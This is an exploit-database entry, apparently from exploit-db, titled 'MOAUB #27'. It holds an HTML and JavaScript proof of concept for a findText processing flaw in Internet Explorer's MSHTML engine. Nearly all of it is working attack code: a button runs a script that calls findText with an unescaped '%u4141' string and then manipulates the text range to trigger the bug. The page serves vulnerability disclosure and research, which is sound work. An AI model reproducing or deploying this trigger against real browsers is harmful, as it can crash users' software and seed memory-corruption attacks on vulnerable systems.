[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : MOAUB #27 - Microsoft Internet Explorer MSHTML Findtext Processing Issue
# Published : 2010-09-27
# Author : Abysssec
# Previous Title : Fox Audio Player 0.8.0 .m3u Denial of Service Vulnerability
# Next Title : Hanso Player Version 1.3.0 (.m3u) Denial of Service Vulnerability
<html>
<body>
<input type="button" value="Crachme!" onclick="Search()"/>
<input type="text" value="Abysssec" id="Abysssec"></textarea>
<script type="text/javascript">
function Search(){
var textinput = document.getElementById("Abysssec");
var textRange = textinput.createTextRange();
textRange.findText(unescape("%u4141"),-1);
textRange.select(document.getElementById('d'));
document.body.appendChild(textinput);
}
</script>
<p id="p">Abysssec</p>
http://www.exploit-db.com/moaub-27-microsoft-internet-explorer-mshtml-findtext-processing-issue/
</body>
</html>
</p>
</body>
</html>